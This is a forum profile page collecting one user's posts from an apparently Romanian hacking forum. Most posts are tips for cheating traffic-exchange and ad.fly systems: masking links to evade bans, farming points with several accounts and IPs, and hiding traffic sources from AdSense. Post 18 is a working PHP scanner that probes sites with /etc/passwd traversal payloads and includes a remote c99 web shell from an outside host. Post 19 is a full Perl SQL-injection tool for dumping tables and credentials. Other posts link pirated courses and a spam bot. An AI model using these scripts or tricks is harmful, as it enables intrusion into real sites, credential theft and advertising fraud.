Jump to content

ZeroCold

Active Members
  • Posts

    1376
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by ZeroCold

  1. @ovidiu, o metoda ar fi sa iti creezi un subdomeniu la 000webhost sau in alta parte, scrii ceva pe index si il adaugi. Dupa ce il accepta, editezi index.php si ii faci redirect pe adfly sau unde vrei... Singura problema e sa nu alocati multe puncte ca il sterge dupa un anumit timp, 500 ajung apoi il adaugati iar si tot asa. (tastata treaba, am pierdut 15k pct ) Nu doar ca ii apare link-ul tau de adfly dar ii opreste si surful utilizatorului pe pagina ta, ca ii da redirect. (cred ca de asta va sterge link-ul, primeste report.)
  2. Nu merit rep, in afara de explicatia de la sfarsit (ce am scris in romana) e copy/paste. Mersi totusi! @Patrunjel, era o chestie pe la tools prin adfly puteai sa faci framedbanner, la ala nu am vazut nici un buton de skip sau altceva, dar am inteles ca platesc mai putin (nu stiu sigur daca asa este). Oricum la 10.000 de vizite, 5-6 sute tot iti dau click... Si nu neaparat trebuie sa il folosesti cu adf.ly alea 10.000 poti sa le folosesti si la alte lucruri.
  3. Nu am testat, nu merge asa, incercati alte site-uri pt scurtat url sau faceti voi niste redirecturi.
  4. Okay so first of all your going to want to register for 10khits. Now this site is VERY cheep, and if you auto surf 1,000 links they give you a FREE 10,000 Points you can use to direct 10,000 people to what ever link you want. Or if your willing to spend a few bucks and buy points here are the account and package plans: But what I did was just let my computer auto surf over night and then i got my 10k surf points Now what you want to do once you have earned the 10k surf points is get a link to a random site idc what site it is, it could be Google for all you care, and turn it into an adf.ly link. WARNING: If you try to submit an adf.ly link to be put into the surf pool on 10khits, it will get rejected. So what we have to do now is mask the link, WARNING: Do not just go to goo.gl or bit.ly to mask the link, we have to mask the link twice, using a service called www.shadyurl.com. What shadyurl.com basically does is turns the URL into a humerous URL, you can use other masking services but I choose this one because it was on vSauce and i knew it worked. Ok now next, your going to want to go to TinyURL.com - shorten that long URL into a tiny URL (its a URL shortening service) or bit.ly but i haven't tried that yet. WARNING: DO NOT USE GOO.GL , I LEARNED THEY WILL BAN ADF.LY LINKS. Okay now your final step is to submit your URL into the Surf pool on 10khits. On 10khits navigate to where it says "Add new site" Should look like this: Now it will take you to a page looking like this: Submit the website, and wait for 10-30 minutes for your website to get approved. Now what will happen, is your adf.ly url will be inserted into a pool of tons of other URL's and people will visit your URL, and you will get money on adf.ly. ============================================== !*!*! UPDATE: Daca fac figuri Shadyurl si tinyurl, inregistrati-va voi un subdomeniu moca si faceti redirect catre adf.ly. Iar in tinyurl sau shady.. bagati subdomeniu vostru si gata. !*!*! UPDATE2: Daca tot se dau 10.000 pcte prima data cand faci 1.000, faceti in felul urmator. 1. Deschideti google chrome, va faceti cont si ii dati surf. 2. Deschideti mozilla firefox, cautati tutorialul postat de mine pe aici despre nologin ("Tutorial nologine"), rulati firefox cu alt ip (vedeti in tutorial ce si cum...), va faceti alt cont si tineti ambele browsere deschise. In felul asta faceti 20.000
  5. Pai in timp ce le faci le foloseste... Nu ai cum sa aduni, decat daca opresti campania
  6. ce minute in plus? La stop traffic after the site... pui unlimited, si lasi earn traffic activ. Minutele care le faci le utilizeaza imediat de aia nu ai nimic in + (daca la asta te-ai referit)
  7. Cat de mult vrei tu, poti sa il setezi nelimitat sau sa ii dai tu minute... ps: daca faci rost de mai multe rdp-uri da-mi si mie unul, te rog. Mersi!
  8. - poti seta cat timp sa stea pe site-ul tau (maxim 60 sec) - poti seta cati vizitatori sa ai in 1 ora. - poti seta cand sa se opreasca (de ex, cand ajunge la 1000 de vizite...) - si au optiune de adsense safe, pt care tre sa platesti 5 euro, dar daca iti faci 3 conturi moca (de ex la 000webhost... etc) iar pe fiecare faci redirect, pt cei care nu stiu puneti in header: <meta http-equiv="refresh" content="0;url=http://rstcenter.com" /> Adsense vede traficul venind de pe site-ul X, Y, Z... nu de pe trafficspammer
  9. TrafficSpammer is basically a traffic exchange site. It is an auto-surf and you get credits by surfing the links, which you can assign to your own links and get views. Speeding up the process! Always check at the top at the left side. Sometimes you get bonus link, you just need to click it and you get minutes. Always It's random Sometimes its 2min, sometimes its 3 sometimes 5 Q/A Q: How do I earn traffic? A: Earning traffic is simple! You earn traffic by clicking on the Earn Traffic link in the members area and keeping it open as long as possible. You will be shown the sites of other members, just like other members will see your sites! By viewing their sites, you will earn "minutes". If you are a regular member, you can earn traffic at a maximum rate of 60%. It means that you get back 60% of the time you keep the "Earn Traffic" link open. For example: If you keep it open for 5 hours, you will earn 60% * 5 hours = 3 hours = 180 minutes. The 180 minutes you earned is automatically used by our system to show your sites to other members for a total of 3 hours (180 minutes). Don't forget that you can earn up to 110% of the time you surf instead of only 60% - all you need to do is become a Partner of TrafficSpammer by upgrading your account You also earn traffic from your referrals. Partners of TrafficSpammer earn 50% of the traffic their referrals earn. The person who referred you would earn 50% * 3 hours = 1.5 hours of traffic from you (view the example above). The easiest way to get massive amounts of traffic is to buy minutes from TrafficSpammer - no need for any surfing! We have cheap packages available at all times and remember not to miss the occasional super specials we have! Q: How is this adsense safe? A: It is adsense safe! YOu need to upgrade at the site which is quite cheap 5 Euro per month and you also get 5000 minutes Via upgrade you can hide the traffic source and so you wont get trafficspammer as your referral traffic source link, thus you are safe! Q: How do I earn money? A: Earning money is simple! You need to refer your friends to TrafficSpammer. You can do that by giving them your referral link which you can find in the members' area by clicking on Earn Money If any of your referrals buys something from us, you will earn a percentage of the sale. Upgraded members earn up to 50% of the sale value. For example: One of your referrals buys 100 000 minutes for € 25.96; You would earn 50% * € 25.96 = € 12.98 from that sale (If you are a Partner). The money will be immediately added to your account's cash balance and you will receive an e-mail notifying you about the money earned. You can withdraw the cash once you have € 5 or more in your account. A link called "Withdraw" will appear next to your cash balance and you will be asked for your PayPal e-mail address. We will send the money to you in 2 working days. Each month we pay out hundreds of Euros (€) in cash commissions! Start referring and grab your share now! Register: here.
  10. E oke, eu scot ~20$ / luna.

  11. Mini-tutorial Perl/Tk @ps-axl, imagineaza-ti ca scriptul de sus e primul script in perl pe care il vezi, e prima data cand auzi de perl. Citeste ce ai scris tu: Intelegi ceva?
  12. notat, o sa caut cand am timp... __ Alte sugestii? Faceti o lista
  13. Multumesc tuturor. @coffe, poate o sa imi fac timp sa caut si pt isnooker. @Garry, wordpress, numi permite timpul sa il fac handjob(made)
  14. Site: Hack That Game | The best game cheats network! Un site cu "hack-uri" pt jocuri, (Metin2, WOW, CS, AION si altele) 99% sunt functionale. Postez aproape in fiecare zi cate unul nou, depinde de cum am timp. Cine vrea sa faca schimb de link-uri sa imi dea pm. Orice sugestie, sfat este bine venit/a. Fara comentarii referitoare la sharecash/adfly
  15. Nu pot sa fac o prezentare a fiecarui program pe care il postez, timp pierdut. - SQL injection - Brute Force Attack Nu o sa iti explice nimeni nimic ca la clasa I, rar gasesti persoane care sa aiba rabdare cu tine si timp. Daca vrei sa inveti, inveti singur.
  16. Referitor la capitolul cu regulamentul. Din cate am observat regulamentul = 0, nu se mai aplica. Daca s-ar fi aplicat asa cum trebuie situatia era diferita. Fara warnuri, daca il vezi ca face numai panarama, te uiti la posturile lui: 90% offtopic, caterinca => ban (fara discutii). Folosirea forumului nu este un drept ci un privilegiu, te supui regulilor, bine.. nu -> zbori. Din cate am observat, face unul un post tampit ("vreau un program de spart parole...") apoi vin oile si se dau rotunde ("esti ratat", "nu ai ce cauta aici", "dute si invata" etc), singurul care isi ia ban este copilu ala care era la inceput si vroia si el sa vada ce si cum, restul se muta in alt thread si iar se dau rotunzi... si tot asa. Se duce 1, raman 20. Daca crezi ca ai cunostinte mai bune decat celalat, ajuta-l sau vezi-ti de treaba ta. 1. Aplicati regulamentul asa cum trebuie, reduceti forumul la jumate si il ridicati la un nivel profesional cu trafic de calitate. 2. Il lasati asa, trafic mult si prost, inca 1 an in stilul asta si nu mai ramane nimic, doar caterinca, offtopic si ajutor. E pacat, posturi de calitate sunt, dar nu se observa printre celelalte. Trebuie un regulament nou, care sa poata fi aplicat corect si fara exceptii.
  17. C..C P..s (10-2007) | PDF | 472 pages | 1420045423 | 19.0Mb Process Engineering and Design Using Visual Basic /by Arun K. Datta. Software tools are a great aid to process engineers, but too much dependence on such tools can often lead to inappropriate and suboptimal designs. Reliance on software is also a hindrance without a firm understanding of the principles underlying its operation, since users are still responsible for devising the design. In Process Engineering and Design Using Visual Basic, Arun K. Datta provides a unique and versatile suite of programs along with simultaneous development of the underlying concepts, principles, and mathematics. Each chapter details the theory and techniques that provide the basis for design and engineering software and then showcases the development and utility of programs developed using the material outlined in the chapter. This all-inclusive guide works systematically from basic mathematics to fluid mechanics, separators, overpressure protection, and glycol dehydration, providing basic design guidelines based on international codes. Worked examples demonstrate the utility of each program, while the author also explains problems and limitations associated with the simulations. After reading this book you will be able to immediately put these programs into action and have total confidence in the result, regardless of your level of experience. All nine programs are available on the companion CD-ROM, including a useful unit conversion tool. Download: http://depositfiles.com/files/9ufu0rjjc Mirror: http://uploaded.to/file/cpclxkr1
  18. <html> <head><title>LFI/RFI/SQL Scanner</title></head> <?php set_time_limit(0); if (isset($_GET["do"])) { $do = explode(":",$_GET["do"]); if ($do[0] == "selected") {selected($do[1]); } elseif ($do[0] == "scantime") { scantime($do[1]); } } else { main(); } function main(){ echo 'LFI, RFI, SQL - Scanner <form action="" method="post"> Site to test: <input name="scan" type="text" /> <input type="submit" name="searchn" value="Scan"/> </form>'; $link = $_POST['scan']; preg_match('@^(?:http://)?([^/]+)@i',$link, $matches); $host = $matches[1]; function getLinks($link) { $ret = array(); $dom = new domDocument; @$dom->loadHTML(file_get_contents($link)); $dom->preserveWhiteSpace = false; $links = $dom->getElementsByTagName('a'); foreach ($links as $tag) { $ret[$tag->getAttribute('href')] = $tag->childNodes->item(0)->nodeValue; } return $ret; } if (isset($_POST["searchn"])) { echo '<form action="lfi.php?do=selected" method="post">'; echo "<br>Links found: <ol>"; if (preg_match("/=/", $link)) { echo '<input name="sites[]" type="checkbox" id="sites[]" value="'.$link.'">'.$link.'<br>'; } $urls = getLinks($link); if(sizeof($urls) > 0) { foreach($urls as $key=>$value) { if (preg_match("/=/i", $key)) { if (preg_match("/.com|.net|.org|.co.uk|.com.au|.us/", $key)) { echo '<input name="sites[]" type="checkbox" id="sites[]" value="'.$key.'">'.$key.'<br>'; } else{ echo '<input name="sites[]" type="checkbox" id="sites[]" value="'.$host.'/'.$key.'">'.$host.'/'.$key.'<br>'; } } } echo "</ol>"; } else { echo "</ol>"; echo "No exploitable links found at $link<br><br>"; } echo "<input type='submit' value='Scan Sites'></form>"; } } function selected(){ echo '<form action="lfi.php?do=scantime" method="post">'; $sites = $_POST['sites']; $n = count($sites); $i = 0; $r = 1; echo "Testing.." . "<ol>"; while ($i < $n) { $site = "{$sites[$i]}"; $equals = strrpos($site,"="); $siteedit = substr_replace($site, '', $equals+1); echo "<br />$r. $siteedit<br />"; rfi($siteedit); lfi($siteedit); sql($siteedit); $i++; $r++; } echo "</ol>"; echo "<a href='lfi.php'>Test again</a>"; } function lfi($site) { $lfifound = 0; $lfi = array( "/etc/passwd", "../etc/passwd", "../../etc/passwd", "../../../etc/passwd", "../../../../etc/passwd", "../../../../../etc/passwd", "../../../../../../etc/passwd", "../../../../../../../etc/passwd", "../../../../../../../../etc/passwd", "../../../../../../../../../etc/passwd", "../../../../../../../../../../etc/passwd", "../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../../../../etc/passwd", "/etc/passwd%00", "../etc/passwd%00", "../../etc/passwd%00", "../../../etc/passwd%00", "../../../../etc/passwd%00", "../../../../../etc/passwd%00", "../../../../../../etc/passwd%00", "../../../../../../../etc/passwd%00", "../../../../../../../../etc/passwd%00", "../../../../../../../../../etc/passwd%00", "../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../../../../etc/passwd%00", "/proc/self/environ", "../proc/self/environ", "../../proc/self/environ", "../../../proc/self/environ", "../../../../proc/self/environ", "../../../../../proc/self/environ", "../../../../../../proc/self/environ", "../../../../../../../proc/self/environ", "../../../../../../../../proc/self/environ", "../../../../../../../../../proc/self/environ", "../../../../../../../../../../proc/self/environ", "/../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../../../../proc/self/environ", "/proc/self/environ%00", "../proc/self/environ%00", "../../proc/self/environ%00", "../../../proc/self/environ%00", "../../../../proc/self/environ%00", "../../../../../proc/self/environ%00", "../../../../../../proc/self/environ%00", "../../../../../../../proc/self/environ%00", "../../../../../../../../proc/self/environ%00", "../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../proc/self/environ%00", "/../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../../../../proc/self/environ%00" ); $totallfi = count($lfi); for($i=0; $i<$totallfi; $i++) { $GET = @file_get_contents("$site$lfi[$i]"); if (preg_match("/root/i",$GET, $matches)) { echo "LFI found: $site$lfi[$i]<br>"; $lfifound = 1; } } if ($lfifound == 0) { echo "No LFI found.<br>"; } } function rfi($site) { $rfifound = 0; $rfi = "http://www.evilc0der.com/c99.txt?"; $GET1 = @file_get_contents("$site$rfi"); if (preg_match("/root/i",$GET1, $matches)) { echo "RFI found: $site$rfi<br>"; $rfifound = 1; } if ($rfifound == 0) { echo "No RFI found.<br>"; } } function sql($site) { $sqlfound = 0; $sql = "99'"; $GET2 = @file_get_contents("$site$sql"); if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET2, $matches)) { echo "SQL var: $site$sql<br>"; $sqlfound = 1; } if ($sqlfound == 0) { echo "Sql Yok.<br>"; } } ?> </html>
  19. #!/usr/bin/perluse LWP::Simple; if(!$ARGV[2]) { print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n========================================="; print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n"; print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n"; exit (0); } @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table', 'miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass', 'tAdmin','tadmin','user_password','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email', 'user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins', 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador', 'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena','auth','key','senha', 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization', 'membros','utilizadores','staff','nuke_authors','accounts','account','accnts', 'associated','accnt','customers','customer','membres','administrateur','utilisateur', 'tuser','tusers','utilisateurs','password','amministratore','god','God','authors', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members', 'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO'); @nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username'); if ( $ARGV[0] !~ /^http:/ ) { $ARGV[0] = "http://" . $ARGV[0]; } if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--") { $cmn.= "+"; $cfin.="--"; print "\n[+] Comments to use: '--' & '+'"; } else { $cmn.= "/**/"; $cfin.= "/*"; print "\n[+] Comments to use: '/*' & '/**/'"; } open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n"; if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK") { print "\n[!] Skipping the initial check...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "\n[!] Checking if the website is vulnerable...\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin; $response=get($sql)or die("[-] Wrong Website, check it\n"); if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/) { print "[+] Vulnerable website, script continues...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n"; exit(1); } } print "\n[!] Looking up columns...\n"; for ($column = 0 ; $column < $ARGV[1] ; $column ++) { $union.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 0) { print WEB "\n[COLUMNS]:\n\n"; $inyection = ''; $union = ''; } $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin; $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n"); if($response =~ /loginpwnz/) { $column ++; print "[+] The site has $column columns\n\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin; print "$sql\n"; print WEB "$sql\n"; print "\n[!] Checking if Information_Schema exists..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin; $response=get($sql)or die("[-] Impossible to get Information_Schema\n"); if($response =~ /loginpwnz/) { print "\n[+] Information_Schema available...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin; print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n"; } else { print "\n[-] Information_Schema unavailable"; } print "\n[!] Checking if MySQL.User exists..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin; $response=get($sql)or die("[-] Impossible to get MySQL.User\n"); if($response =~ /loginpwnz/) { print "\n[+] MySQL.User available...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin; print WEB "\n\n[MYSQL.USER]:\n\n$sql\n"; } else { print "\n[-] MySQL.User unavailable"; } while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764)'; $loadcont++; } print "\n[!] Checking if it is possible to inject LOAD_FILE..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n"); if($response =~ /root:x:/) { print "\n[+] LOAD_FILE available...saving in $ARGV[2]"; print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n"; } else { print "\n[-] LOAD_FILE unavailable"; } if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T") { print "\n\n[!] Brute forcing tables..."; print WEB "\n\n[TABLES]:\n\n"; foreach $tabla(@nombretabla) { chomp($tabla); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { print "\n[+] Table $tabla exists...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin; print WEB "$sql\n"; } } } if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C") { print "\n\n[!] Table to brute force columns: "; $tabla.=''; chomp($tabla); print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n"; foreach $columna(@nombrecolumna) { chomp($columna); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { print "\n[+] Column $columna available...saving in $ARGV[2]"; print WEB "$columna\n"; } } } print WEB "\n\n\n[*EOF*]"; print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n"; print "## c0ded by Bl4k3 | 2010 ##\n\n"; exit (0); } } print "[-] Impossible to find number of columns, try more columns\n\n"; print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n"; exit (0);
  20. HOW IT WORKS: You type your keyword into the search bar and hit the search button. The software will then go and scrape the sellers gigs from Fiverr based on that keyword. You can then mass message the customers of the sellers (people that gave feedback) offering your gig services. DOWNLOAD: [/B]http://www.filesonic.ro/file/4136344095/FiverrBot.rar http://www.mediafire.com/?1839uhtzgyhwz31[B]
  21. Pret 50 euro negociabil!
  22. CBT Nuggets - EC Council Certified Ethical Hacker v7.0 Training Course CBT Nuggets - EC Council Certified Ethical Hacker v7.0 Training Course Language: English FLV | H264 147kbps | 800 x 600 23.98fps | AAC 384kbps | 942 MB Genre: E-Learning IT training guru James Conrad's newest Certified Ethical Hacker training will show you just how important it is to know thy enemy. You'll see how frighteningly easy it can be to hack into a system, elevate your privilege and quickly “own” a machine. You'll learn how easy it can be to crack passwords even those that would be considered “secure.” You'll learn how hackers create the dreaded Trojans that can potentially infect the computer of an unsuspecting user and taking control of the machine to infiltrate networks. Why will we teach you these things? Because you have to know the hackers' tricks to prevent them from accessing your users. Most Certified Ethical Hackers become highly adept at detecting and thwarting security threats - preventing significant harm to your business and making you an incredible asset! You can also use your new skills to move into the field of penetration testing utilizing your CEH to test the security of your client's systems. 01 - Certified Ethical Hacker Series Introduction 02 - Introduction to Certified Ethical Hacking 03 - VMWare and Linux 04 - Footprinting and Reconnaissance Part 1 05 - Footprinting and Reconnaissance Part 2 06 - Scanning Part 1 07 - Scanning Part 2 08 - Enumeration 09 - Passwords Part 1: Windows 10 - Passwords Part 2: Linux 11 - System Hacking 12 - Malware 13 - Hack-O_Rama 14 - Sniffing 15 - Social Engineering 16 - Denial of Service 17 - Session Hijacking 18 - Web and SQL Hacking 19 - Cryptography 20 - Intrusion Detection Systems 21 - Hacking Wireless Networks Download: http://extabit.com/file/29gzc7mnzpvs5/ http://extabit.com/file/29gzc7mnzpz05/ http://extabit.com/file/29gzc7mnzpvsl/ http://extabit.com/file/29gzc7mnzpyx1/ http://extabit.com/file/29gzc7mnzpvwl/ http://extabit.com/file/29gzc7mnzpyxh/ http://extabit.com/file/29gzc7mnzpvx1/ http://extabit.com/file/29gzc7mnzpyxx/ http://extabit.com/file/29gzc7mnzpvxh/ http://ul.to/j7qtgiwh/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part01.rar http://ul.to/flwqk75z/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part02.rar http://ul.to/vogk4j2j/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part03.rar http://ul.to/6yhhl1gd/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part04.rar http://ul.to/l0khdiz0/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part05.rar http://ul.to/qmhe591g/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part06.rar http://ul.to/joxde52e/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part07.rar http://ul.to/pjuvnw6n/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part08.rar http://ul.to/shzy804p/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part09.rar http://ul.to/p5y1iqt0/CBT.Nuggets-EC.Council.Certified.Ethical.Hacker.v7.0.part10.rarhttp://extabit.com/file/29gzc7mnzpvrp/
  23. Dupa cum reiese si din titlu, vand scriptleech.com Created on: Sun 08/07/2011 Expires: Tue 08/07/2012 1.500 pagini indexate in google, PR 2... Nu am mai avut timp sa ma ocup de el, se descurca binisor si fara mine. Am cateva backlinkuri pe diverse bloguri/siteuri, pe youtube, pe twitter. Astept oferte, aici sau prin PM. Va rog, fara reply-uri/pm-uri aiurea. Pretul e negociabil, veniti cu oferta iar eu o sa va zic + sau - Plata prin paypal (euro, lei sau $). Imi trimiteti banii, eu va dau user, pass... va ajut sa schimbati email, tot ce trebuie
  24. Majoritatea persoanelor care folosesc internetul nu dau 2 bani pe datele personale, nici nu se gandesc ca cineva le-ar putea fura datele. Gandesc la modu "Nu are ce sa faca y cu datele mele (data nasterii, nume, adresa etc)" si nu acorda atentie. Referitor la articol, personal mi se pare slab... Am auzit povestea cu kevin de nspe ori in nspe variante, nu mai scrie nimeni un articol bun in ziua de azi? Arhiva politiei nu era mai simplu sa intrebe o cunostiinta de-a ei? (ruda, prieten, coleg etc.) ...
×
×
  • Create New...